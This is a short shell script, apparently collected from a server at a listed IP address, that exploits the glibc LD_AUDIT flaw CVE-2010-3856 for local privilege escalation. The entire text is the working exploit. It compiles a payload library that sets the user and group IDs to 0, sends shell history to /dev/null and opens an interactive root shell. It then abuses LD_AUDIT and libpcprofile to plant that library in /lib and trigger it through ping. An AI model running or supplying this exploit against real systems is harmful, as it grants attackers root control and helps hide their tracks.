62.152.104.149 glibc.sh CVE-2010-3856

1. -----------------------------------------------------------
2. glibc.sh file on 62.152.104.149 aka CVE-2010-3856
3. http://packetstormsecurity.org/files/106817/glibc-LD_AUDIT-Privilege-Escalation.html
4. -----------------------------------------------------------
5.  
6. #!/bin/sh
7.  
8. echo "[+] Setting umask to 0 so we have world writable files."
9. umask 0
10.  
11. echo "[+] Preparing binary payload."
12. cat > /tmp/payload.c <<_EOF
13. void __attribute__((constructor)) init()
14. {
15.         printf("[+] Cleaning up.\n");
16.         unlink("/lib/libexploit.so");
17.  
18.         printf("[+] Launching shell.\n");
19.         setuid(0);
20.         setgid(0);
21.         setenv("HISTFILE", "/dev/null", 1);
22.         execl("/bin/sh", "/bin/sh", "-i", 0);
23. }
24. _EOF
25. gcc -w -fPIC -shared -o /tmp/exploit /tmp/payload.c
26.  
27. echo "[+] Writing root owned world readable file in /lib"
28. LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/lib/libexploit.so" ping 2>/dev/null
29.  
30. echo "[+] Filling the lib file with lib contents."
31. cat /tmp/exploit > /lib/libexploit.so
32. rm /tmp/payload.c /tmp/exploit
33.  
34. echo "[+] Executing payload."
35. LD_AUDIT="libexploit.so" ping